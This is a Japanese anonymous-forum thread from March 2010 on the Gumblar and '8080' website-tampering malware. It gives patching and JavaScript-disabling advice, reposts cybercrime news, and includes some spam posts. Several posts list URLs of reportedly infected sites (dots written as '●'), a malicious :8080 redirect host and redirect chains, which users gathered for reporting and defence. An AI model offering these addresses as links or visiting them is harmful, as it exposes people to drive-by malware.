10/03/08 23:49:37
Gumblar().x、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)~(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
3:名無しさん@お腹いっぱい。
10/03/08 23:50:19
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
URLリンク(get.adobe.com)
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
URLリンク(get.adobe.com)
URLリンク(www.adobe.com)
・Flash Playerのバージョン確認
URLリンク(www.adobe.com)
URLリンク(www.adobe.com)
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
URLリンク(www.adobe.com)
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
URLリンク(www.java.com)
・Javaのバージョン確認
URLリンク(www.java.com)
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
URLリンク(www.apple.com)
■ RealPlayerを更新 (使っていないならアンインストール)
URLリンク(jp.real.com)
4:名無しさん@お腹いっぱい。
10/03/08 23:53:41
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
5:名無しさん@お腹いっぱい。
10/03/08 23:58:27
ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
URLリンク(www.gred.jp)
・aguse
URLリンク(www.aguse.net)
・WebGetter
URLリンク(rd.or.tp)
・Dan's View Source
URLリンク(www.dan.co.uk)
・Gumblar Checker 3(8080系用)
URLリンク(gumblar.s1.dynamitelife.net)
・Gumblar.X Checker
URLリンク(gumblar.s1.dynamitelife.net)
6:名無しさん@お腹いっぱい。
10/03/08 23:59:31
以上でテンプレ終了。
7:1-6
10/03/09 00:05:26
>>2 修正
Gumblar().x、8080系ウイルス対処法。
↓
Gumblar(.x)、8080系ウイルス対処法。
変なとこでみすった・・・orz
8:名無しさん@お腹いっぱい。
10/03/09 00:10:43
>>1
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
URLリンク(www.geocities.jp)
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
Gumblar Checker2=URLリンク(gumblar.s1.dynamitelife.net)
Gumblar Checker 3=URLリンク(gumblar.s1.dynamitelife.net)
aguse.net サイト情報検索=URLリンク(www.aguse.net)
飛び先のチェック=URLリンク(www.kakiko.com)
WebGetterでソースを見る=URLリンク(rd.or.tp)
WebGetterでタグを除去してソースを見る=URLリンク(rd.or.tp)
WebGetterでリンクを抽出する=URLリンク(rd.or.tp)
Dan's View Sourcelでソースを見る=URLリンク(www.dan.co.uk)
Dr.WEB=URLリンク(online.drweb.com)
9:名無しさん@お腹いっぱい。
10/03/09 00:50:59
>>4
このスレ的には関係ないから無視すること
10:名無しさん@お腹いっぱい。
10/03/09 00:52:08
つか>>1の*** 通報したら重複を防ぐために宣言すること ***って要らないでしょう
1人が通報したぐらいじゃ動かない所もある訳だし
11:名無しさん@お腹いっぱい。
10/03/09 03:51:51
1.ロシア(27.89%)
2.中国(26.52%)
3.米国(9.98%)
4.ブラジル(6.77%)
5.ウクライナ(5.45%)
6.英国(5.34%)
7.フランス(3.81%)
8.ドイツ(2.41%)
9.スウェーデン(1.6%)
10.スペイン(1.37%)
セキュリティ - ZDNet Japan
URLリンク(japan.zdnet.com)
セキュリティソフトウェアメーカーのPC Toolsによれば、
マルウェアのロシア発のマルウェアの割合は27.9%。これに対して中国の割合は26.5%。過去の調査では
世界2位になってしまった米国は今回、3位(10%弱)となった。
PC Toolsは、マルウェアをばらまく犯罪者集団Russian Business Networkが消滅したにも関わらず、ロシア
の生産量が落ちていないことを指摘している。
PC ToolsのマルウェアアナリストSergei Shevchenko氏は声明で「Russian Business Networkがいなくなった
ところに、ほかのマルウェアディストリビュータが入り込んでいる」と述べる。「結果として、過去にないくらい
多くのウイルスやスパイウェアがロシアから出てきている。そして、マルウェアの複雑さが増している」
(Shevchenko氏)
さらに、今はなきRussian Business Networkのほうが、その代わりに出てきた小規模な組織よりも追跡しや
すかったとShevchenko氏は言う。「現在は、ロシアのマルウェアホスティングサービスが、マレーシアや中国、
パナマ、シンガポール、タイ、トルコ、インドのサーバに目を向けている」
12:名無しさん@お腹いっぱい。
10/03/09 07:03:14
@IT - アットマーク・アイティ 2010/01/31
URLリンク(www.atmarkit.co.jp)
カスペルスキーがサイバー犯罪の最新動向を説明
Twitterのアカウント、闇市場で1000ドルで売買も
フォロワー数やアカウントの利用スタイルによって価格は異なるが、
Twitterのアカウントは闇市場で1アカウントあたり500ドルや1000ドルで売買
されている―。そんなショッキングな数字を挙げて、最新のサイバー犯罪
の潜在的危険性について警鐘を鳴らすのは、ロシアのセキュリティ企業、カ
スペルスキーのセキュリティ研究者、ドミトリー・ベストゥージェフ氏だ。
カスペルスキーは2010年1月28日にモスクワで記者向けの説明会を開
催。この中でベストゥージェフ氏は「あなたの値段はいくら?」(How much do
you cost?)と題した講演を行い、闇市場の生々しいデータや動向について
語った。ベストゥージェフ氏の講演を中心に、同社のセキュリティ専門家の
話をお伝えする。
13:名無しさん@お腹いっぱい。
10/03/09 07:04:10
@IT - アットマーク・アイティ 2010/01/31
URLリンク(www.atmarkit.co.jp)
なぜブラジルに多いのか?
サイバー犯罪者が集まる闇市場は、一般の市場とまったく同様に市場間の競
争や、価格決定のメカニズムが機能する売買市場となっている。売買の「場」と
なるWebサイトも、ちょうど広場やストリートで非合法の物品を売買するのと同様
に、常に各地の警察当局やISPとイタチごっこを繰り返している。
新興国のISPを中心に、犯罪者は集散を繰り返し、メールアカウント、クレジット
カード番号、SNSアカウントなどを売買しているという。ホストしているISPが闇市
場を強制的にシャットダウンすることもあるが、問題はサイバー犯罪関連の法整
備が遅れているために、こうした犯罪行為に対するリスクが低くなっているケース
があることだという。例えば、銀行のアカウントやクレジットカード情報を盗み出す
「Trojan-Bankers」と呼ばれるマルウェアの発信源のトップはブラジルが26%でダ
ントツに高いが、この背後には「1931年に制定された法律で処理しているため、
初犯は無罪放免。2度目にようやく投獄される」(ベストゥージェフ氏)という事情が
あるという。
捕捉されるリスクが低いことに加えて、高度に分業が進んでいることも、サイバー
犯罪に手を染める人が後を絶たない理由だ。コードを書くだけの人、ボットネットを
レンタルする人、マルウェアやスパムをばらまいてアカウントを集める人、実際に
銀行口座からお金を引き出す人、マネーロンダリングをする人、こうした人々を引
き合わせるオーガナイザーなどというように役割が細分化されている。コードだけ
書く人は、被害者の顔を見ることもないので、犯罪という意識も希薄になりやすい。
14:名無しさん@お腹いっぱい。
10/03/09 07:04:53
@IT - アットマーク・アイティ 2010/01/31
URLリンク(www.atmarkit.co.jp)
偽アンチウイルスソフトの年間被害額は1億5000万ドル
カスペルスキーのような世界的セキュリティ企業ですら、具体的な犯罪者像や正
確な市場規模は把握していないというが、サイバー犯罪者の多くは、暴力や麻薬
取引に関係する「犯罪者」と異なり、見るからに犯罪者の風貌ではないのではない
か、という。1つの仮説は、ITのスキルはあっても職がない途上国や新興国の若者
が関与しているケースが多いのではなか、というもの。ブラジルの事例でこれが確
認されたこともあるという。
闇市場の規模については、例えば近年被害が急増している「Fake AV」と呼ばれる
偽アンチウイルスソフトで、FBIへ寄せられた苦情を元に1億5000万ドルの被害額と
いう試算があるという。Fake AVに感染したPCにはポップアップ画面で多数のウイル
スに感染していると警告が出て、ウイルスの駆除のために正式版にアップグレード
するよう促される。Fake AVの画面は正当なアンチウイルスソフトのように見え、価格
も妥当。多くの人が被害にあっている。このFake AVは300種程度の存在が確認され
ており、そこから「最低でも1万人規模の犯罪者が関与している可能性がある」(イギ
リス担当シニア・リージョナル・リサーチャー デイビッド・エム氏)という。
15:名無しさん@お腹いっぱい。
10/03/09 07:05:34
@IT - アットマーク・アイティ 2010/01/31
URLリンク(www.atmarkit.co.jp)
警戒レベルが低いSNSのアカウントには高い価値
闇市場でやり取りされる「情報」の価格はさまざまだ。例えば「クレジットカード番号
は、国やカード会社によって価格は違う」(ベストゥージェフ氏)といい、アメリカ在住者
のVISA、マスターカードなら1件当たり2ドルだが、同じカードでも英国在住者のもので
あれば4ドル、オーストラリアなら5ドル、EUなら6ドルなどとなる。ゴールドカード、プラチ
ナカードになればさらに価格は上がる。銀行のアカウントであれば、残高やログインが
確認できているかなどの条件によって、価格は数ドルから数十ドルと変わる。
急激に狙われるようになっているのがSNSアカウントだ。カスペルスキーの調査によ
れば、2008年に約3万程度確認されていたSNSをターゲットにしたマルウェアは、2009
年に約6万と倍増したという。SNSは知人、友人、家族など信頼できる人を中心につな
がっていることが多いため、警戒感がない利用者が多い。
このため、例えば5000ユーザーとつながったFacebookのアカウントが300ドルで売ら
れるケースや、数百程度のフォロー、フォロワーを持つTwitterの女性アカウントが数百
ドルや1000ドルで売買されるケースも確認しているという。
16:名無しさん@お腹いっぱい。
10/03/09 07:06:15
@IT - アットマーク・アイティ 2010/01/31
URLリンク(www.atmarkit.co.jp)
今後は地理情報を利用し、自動化された攻撃も
高度に発達するSNSやWebサービスを利用して、今後は攻撃の「自動化」が進行する
だろう。こう予測するのは「なぜ災害はいつもあなたの都市を襲うのか?」(Why does the
disaster always strike your city?)と題した講演を行ったステファン・テナス氏だ。
SNSでは地理情報や個人の嗜好といった情報を共有し、これが効率的なターゲット広告
というイノベーションを生み出す土壌になっているが、これは同時にサイバー犯罪者たち
にとっても利用価値の高い情報だ。
例えば、地理情報。ユーザーの住む場所を取得し、偽のニュースサイトに掲載する速報
に、あたかもそのユーザーが住む都市で爆破事件が起こっているかのように見せることが
可能だろうという。見ている全員が、それぞれ都市名の部分だけをすり替えられたニュース
を読む。さらに、Google翻訳のAPIを利用して都市名を英語名で埋め込むようなこともできる。
Koobfaceと呼ばれるマルウェアは、マルウェアをダウンロードさせるWebサイトへのリンク
が張られたメッセージを、Facebookのユーザーになりすまして投稿する。これをクリックした
Facebookの「友人」らは、偽のFlashプラグインへのアップデートを促されるという。このとき、
上記のような偽ニュースが使われれば、早く映像を見たいという気持ちからプラグインをダウ
ンロードする確率は上がるだろう。
現在、SNSで広がる攻撃は、初心者ユーザーをターゲットにしていて初歩的なソーシャル
・エンジニアリングを使っているものが多いという。それでも十分に効果があるからだ。カス
ペルスキーでは、2010年にはこうした攻撃の高度化や自動化が進むと見ているという。また、
モバイル端末を狙ったモバイルボットネットの登場も時間の問題だろうと考えているという。
17:名無しさん@お腹いっぱい。
10/03/09 07:06:56
@IT - アットマーク・アイティ 2010/01/31
URLリンク(www.atmarkit.co.jp)
一般的なインターネットユーザーの値段:920ドル
従来、サイバー犯罪といえば銀行口座のパスワードやクレジットカード番号など直接的に
換金可能な情報が中心だった。このため、オンラインショッピングやオンラインバンキングを
利用しないPCユーザーは安全に感じているかもしれない。ところがベストゥージェフ氏は、
犯罪者にとっては狙う価値がないユーザーはいないという。
オークションサイトやSNSのアカウントには価値があるし、アカウントが何もないとしても、ネ
ットワーク接続されたPCには犯罪者にとって利用価値がある。DDoS攻撃のボットネットとして
バルクで換金できるからだ。2009年10月から広がっているGumblarシステムも、いまや7万台
のサーバが感染した状態のまま超広帯域のボットネットを構成している。ホームPCが7万台の
ボットネットに比べて1000倍程度のDDoS攻撃の能力があることを意味する。一切人手を介さ
ずにサーバとクライアント間で巧みに自己拡大するGumblarは2009年12月に活動をやめて感
染拡大は止まっているが、大規模なDDoS攻撃に備えている可能性のほかに、闇市場で攻撃
インフラの売買を始めている可能性も考えられるという。
ベストゥージェフ氏は講演の最後に、簡単なフォームを使って、ユーザー1人当たりが持つ情
報の値段を弾き出してみせた。メールアカウント3つ、残高が3000ドルの銀行のアカウントが1つ、
Facebookのアカウントが1つ、ブロードバンド接続のPCは2台、などと標準的なインターネットユー
ザーの有益な情報を闇市場の価格を元に計算すると、実に920ドル。闇市場においてデジタル
データは想像以上の高値で取り引されているようだ。
18:名無しさん@お腹いっぱい。
10/03/09 07:17:12
^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
19:名無しさん@お腹いっぱい。
10/03/09 07:27:29
※以上は人間への感染例です
20:名無しさん@お腹いっぱい。
10/03/09 07:33:33
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
21:名無しさん@お腹いっぱい。
10/03/09 11:10:10
ここも7スレ目で打ち止めだな、こりゃ…
22:名無しさん@お腹いっぱい。
10/03/09 11:42:49
良い意味でですか?
23:名無しさん@お腹いっぱい。
10/03/09 13:52:50
前スレで報告があったページで今もスクリプトが埋まってるのは少なくとも54
その中でgoogleセーフブラウジングが警告するのは18
24:名無しさん@お腹いっぱい。
10/03/09 14:11:09
>>21
IDの出ないセキュ板は荒れるからなあ
いっそインターネット板にでも移住するかね
とはいえ最近はアップデート以外の対策が難しくなってきているから
このスレの役目も終わりに近づいてるのかも知れんが
25:名無しさん@お腹いっぱい。
10/03/09 14:14:42
>>23
どれよ?
通報しるから列挙しる!
26:名無しさん@お腹いっぱい。
10/03/09 14:17:50
もう周知徹底してるから必要ないかも
27:名無しさん@お腹いっぱい。
10/03/09 14:20:16
>>25
増えそうだからちょっと待って
28:名無しさん@お腹いっぱい。
10/03/09 14:32:59
1benpi●mecha-kawa●com
1kyujin●mecha-kawa●com
15kinyu01●kyashingoo●com
18kinrpg●com
21kinyu01●kyashingoo●com
21saimu04●manjusyage●com
34di●mecha-kawa●com
54wanwanmonogatari68●info/
brownie-mart●com
camp●kanji2001●com
e-risingsun●net
ebook-style●com/modules/xfsection/index●php?
ec●uuhp●com/~chillnet
faac3020●cpinet●jp/
hanahaitatsu●com/
hout●kanji2003●com
info0825●com/horihori
jkjom●com
joseiyodwife●com
junkankangoshi●com/cat1039
kagoshima●cool●ne●jp/fantasy_17/
kateikyousi-turtle●com
kei●keita-house●com/torabaayu_kansai
kinzokunensuu●com
kinzokunensuu●com/cat993
lblgs●com/
link●sfidalife●com
manjusyage●com/
mizuhaitatsu●com
park21●wakwak●com/~enyaraya/
pc-net●webinfo●jp
pipestudio●net
29:名無しさん@お腹いっぱい。
10/03/09 14:33:51
seikakutest●net
shaddytoriyosesite●livedoor●biz
shogaishakoyo●com/
suemari●com/movie
sunrise●2pg●in/suzukiucar/index2●html
thismonky●com
unmeideai●com
www●1biyou●net
www●avis●ne●jp/~muranaka/
www●borneomarathon●com/jpn/home●html
www●dgnx●net/
www●g-mania●org
www●gocha-mix●net/cgi-bin/blog/
www●hct●zaq●ne●jp/cpacs503/
www●jpdrag●com
www●kadoma-c●com
www●kidscorner●jp/main●php
www●kikuyakikai●com
www●oumc-obog●com/2008/01
www●pzaki●com
www●ruco25●net
www●sesica●co●jp
www●shinnippo●co●jp/ssff/2006hiroshima/
www●sue-arc●com
www●win-win777●com/karuizawa/
www12●plala●or●jp/atakashi/sk
www13●plala●or●jp/metal-militia/
www2●odn●ne●jp/2711726/
www2●odn●ne●jp/2711726/index_02●html
www4●ocn●ne●jp/~ikl/member/index●htm
xn--com-r10es86d●jp/
30:名無しさん@お腹いっぱい。
10/03/09 14:59:59
>>26
31:名無しさん@お腹いっぱい。
10/03/09 16:56:45
63サイトのうち33サイトがデジロック
32:名無しさん@お腹いっぱい。
10/03/09 17:00:09
このような何ら対策を講じようとしないホスティングサービス屋は,
しかるべきところに通報し行政指導されるべきだ
33:名無しさん@お腹いっぱい。
10/03/09 17:19:25
その行政が穴のあいた鯖使ってるから困る
34:コテハン
10/03/09 18:02:08
実は新コード来てるし・・・
//www●dd●iij4u●or●jp/~ceh3/span/juku/main●html
註:精神的ブラクラに注意w
「.substr」が目立つ
※チェッカー3は無反応。
35:名無しさん@お腹いっぱい。
10/03/09 18:12:55
>>34のvirustotal
URLリンク(www.virustotal.com)
結果: 0/42 (0%)
36:名無しさん@お腹いっぱい。
10/03/09 18:16:55
>>34
こんな感じか
//bild-de.careerbuilder.com.bile-de.thew.ru:8080
37:コテハン
10/03/09 18:19:32
職場のPCで無謀な事はできんので、
帰宅後に発掘作業を再開する・・・
でも、残業がががorz
38:名無しさん@お腹いっぱい。
10/03/09 18:47:23
そうだ、googleにスパム報告すればいいんだ・・・
39:名無しさん@お腹いっぱい。
10/03/09 19:15:07
>34
URLリンク(tinyurl.com)
でひっかかる
40:コテハン
10/03/09 20:04:24
一件だけ投下・・・
//www●kikuyakikai●com/index●html ←再発
41:名無しさん@お腹いっぱい。
10/03/09 22:08:26
>>34
何この俺得サイト
42:名無しさん@お腹いっぱい。
10/03/10 12:28:08
Internet Explorer の脆弱性により、リモートでコードが実行される
公開日: 2010年3月10日 | 最終更新日: 2010年3月10日
URLリンク(www.microsoft.com)
問題を緩和する要素:
Internet Explorer 8 は、この脆弱性による影響を受けません。
43:名無しさん@お腹いっぱい。
10/03/10 12:37:40
IE5.01とIE8は影響を受けないのか
44:名無しさん@お腹いっぱい。
10/03/10 12:59:57
28-29に追加
bikebikekaitori●com
45:名無しさん@お腹いっぱい。
10/03/10 15:25:35
firefoxに移行したから
IE削除するかな
46:名無しさん@お腹いっぱい。
10/03/10 15:30:40
Microsoft Updateするから残しとけ
自己責任で
47:名無しさん@お腹いっぱい。
10/03/10 17:50:28
狐でもマイクロソフトからあるアドオンをDLして有効化したらアップデート使えるよ?なんて名前のアドオンか忘れたけど
何時頃からかは知らんがEUのお偉いさん連中がWindowsにIEを初期付属してるのが法律違反だとかほざくからだろうけど
48:名無しさん@お腹いっぱい。
10/03/10 17:56:49
日本語で
49:名無しさん@お腹いっぱい。
10/03/10 18:12:08
スレ1からスレ5までに報告があったページで、今スクリプトが埋まってるURL
coolfocus●jp/seminar/heartful
jaguarracing●xf●cz/xmlrpc●php
mogulclub●com/BANDS_AND_GIGS/index_CIARA●html
s1●shard●jp/dreaming/
s1●shard●jp/dreaming/mitubishiucar/index●html
shop●relax-living●net/bike11/
www●elmwoodguestcottage●com/
www●hakuchi●jp/57577/
www●hakuchi●jp/OTSUYA/
www●hervochapiteaux●be
www●i-paradise5●jp/~simple/otona/index●php
www●mfreep●com
50:名無しさん@お腹いっぱい。
10/03/10 20:29:39
【クラウド】「gred AntiVirusアクセラレータ」ETHOSエンジンを追加し、さらにウイルス検知機能を強化
スレリンク(news板)
51:名無しさん@お腹いっぱい。
10/03/11 01:03:03
また糞狐が釣ってるのか
52:名無しさん@お腹いっぱい。
10/03/11 14:35:14
Gumblar(.x)っぽいの
//www●kiyasuisan●co●jp
↓
//gabler-bayreuth●de/cgi-bin/default●php
↓
//alicosrl●it/templates/403●shtml●php
--
//gabler-bayreuth●de/
↓
//pecsa●com●pl/
↓
//seovisiongroup●com/
すっ飛ばしまくって→あふぃ=メシウマ?
53:名無しさん@お腹いっぱい。
10/03/11 15:03:23
日本語でおk
54:名無しさん@お腹いっぱい。
10/03/11 15:36:53
>>52
ウィルスに感染するの?
55:名無しさん@お腹いっぱい。
10/03/11 22:08:20
>>40
ウイルスバスターがブロック(キリッ
>>34
ウイルスバスター(笑)がスルー
56:名無しさん@お腹いっぱい。
10/03/11 23:07:29
大きなニュースが無いからつまらないな。
感染自体は広がってるんだが
57:名無しさん@お腹いっぱい。
10/03/12 02:44:53
感染を調べる一つの手段として
セーフモードで起動してスタートアップに何ちゃらってやつと
ファイル名を指定して実行→regeditどうたらっていうのがあったと思うのですが
あのテンプレみたいの持ってる方いましたら貼ってもらえませんか?
58:名無しさん@お腹いっぱい。
10/03/12 02:46:43
そんなモンテンプレみなきゃ分からんレベルなら
感染してるかと思ったら素直に再インストしろ
59:名無しさん@お腹いっぱい。
10/03/12 08:24:14
>>57
そんなもんあっても1週間もあればウイルスのファイル名が変わるなんてざらだから役にたたん
普段から自動起動しているファイルを調べてないやつには判別もできん
素直にクリーンインスコしろ
60:名無しさん@お腹いっぱい。
10/03/12 10:36:30
oimachi-chintai●com/sitemap/
61:名無しさん@お腹いっぱい。
10/03/12 11:06:30
まあ>>57のことだから
リカバリしてもまた感染するだろうなwww
62:名無しさん@お腹いっぱい。
10/03/12 14:24:14
>>57
( ゚Д゚)ポカーン
63:名無しさん@お腹いっぱい。
10/03/12 14:40:48
//ggcomputer●com/index●html
「dT.prototype =」
64:名無しさん@お腹いっぱい。
10/03/12 15:24:31
株式会社ジェー・ディー・イー JDE
www●jde-net●co●jp/engineering/index●php
65:名無しさん@お腹いっぱい。
10/03/12 17:59:52
【IE 6/7の脆弱性:深刻な状況、早急に対策を~掲示板に誘導書き込みのワナも】
URLリンク(www.so-net.ne.jp)
>攻撃コードが公になったのは11日早朝。
>セキュリティベンダーの情報をもとに攻撃サイトが突きとめられ、
攻撃コードが拾われてしまった。
>このコードが使われると、回避策を適用していないIE 6/7では、
悪質なサイトにアクセスするだけでウイルスに感染してしまうおそれがある。
>コードは、現在も継続中のサイト改ざん攻撃にも即転用が可能で、被害が懸念される。
Mカフィー\(^o^)/オワタw
66:名無しさん@お腹いっぱい。
10/03/12 18:09:47
何やってんのマカフィー
67:名無しさん@お腹いっぱい。
10/03/12 19:51:18
いつもどおりソースコードをコピペでパクれよ馬鹿フィー
68:名無しさん@お腹いっぱい。
10/03/12 19:56:28
マカフィー使ってる奴は情弱かnecユーザーかあどびの社員
69:名無しさん@お腹いっぱい。
10/03/12 20:00:53
アドビの社員は使ってないだろ
使ってるのはFlash Playerとか落としに行ったやつ
70:名無しさん@お腹いっぱい。
10/03/12 20:29:07
>>69
いや、ごめん、全部 俺のことなんだ
71:名無しさん@お腹いっぱい。
10/03/12 21:43:54
昔マカフィーのウィルススキャン使ってたらバグで受信トレイの中身全部消えて死にたくなった
72:名無しさん@お腹いっぱい。
10/03/12 23:03:53
昔のノートンでもそんなバグなかったか?
73:名無しさん@お腹いっぱい。
10/03/12 23:15:50
MSのでもあったろ
74:名無しさん@お腹いっぱい。
10/03/13 00:17:02
全然やらかした事のない
セキュリティソフトなんか
無いんじゃないの?
75:名無しさん@お腹いっぱい。
10/03/13 01:20:46
これどうやって自分が感染してるか確かめるんだよ?
分からなきゃ何度クリーンインストールしても一緒じゃねえか
76:名無しさん@お腹いっぱい。
10/03/13 01:50:36
いつもと違うプロセスがたちあがってりゃわかるだろ
そんなんで逆切れしてっからダメなんだ
77:名無しさん@お腹いっぱい。
10/03/13 06:08:56
>>65-68
は?
78:名無しさん@お腹いっぱい。
10/03/13 11:22:50
反論は文章で
79:名無しさん@お腹いっぱい。
10/03/13 12:01:20
なんかもう騒ぐ人も下火になったなあ
80:名無しさん@お腹いっぱい。
10/03/13 13:23:17
騒いでも再改ざん繰り返す業者が多いからじゃない?
しかも、対応しにくいように徐々にウィルス進化中
81:名無しさん@お腹いっぱい。
10/03/13 13:45:21
.htaccess改ざんに移行して見つけにくくなったのもあるんじゃない?
82:名無しさん@お腹いっぱい。
10/03/13 13:54:12
Evolution and threat of botnetでググれば学術記事が大量に見つかるけど
大学の研究ネタにもなってるとは知らなかったな
83:名無しさん@お腹いっぱい。
10/03/13 14:23:09
>>81
アンチウイルスソフトでも未対応のやつ多そう
84:名無しさん@お腹いっぱい。
10/03/13 14:26:35
なんにしろ対策してれば引っかからないし
ほんとの0dayなんかほとんどない
情弱以外関係ない
85:名無しさん@お腹いっぱい。
10/03/13 14:51:31
,,-―--、
|:::::::::::::;;;ノ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|::::::::::( 」 < なんにしろ対策してれば引っかからないし
ノノノ ヽ_l | ほんとの0dayなんかほとんどない
,,-┴―┴- 、| ∩_ 情弱以外関係ない
/,|┌-[]─┐| \ ( ノ______________
/ ヽ| | 情 | '、/\ / /
/ `./| | 弱 .| |\ /
\ ヽ| lゝ | | \__/
\ |  ̄ ̄ ̄ |
⊂|______|
|l_l i l_l |
| ┬ |
86:名無しさん@お腹いっぱい。
10/03/13 14:55:15
癇に障ったか情弱
87:名無しさん@お腹いっぱい。
10/03/13 14:58:56
情弱と言うか無知なだけ
0day攻撃がしばらく問題だったんだよ
88:名無しさん@お腹いっぱい。
10/03/13 15:02:33
それに未修正の脆弱性もいろいろあるし
いつ攻撃されてもおかしくない
89:名無しさん@お腹いっぱい。
10/03/13 15:03:09
0dayの定義分かってないのか情弱
90:名無しさん@お腹いっぱい。
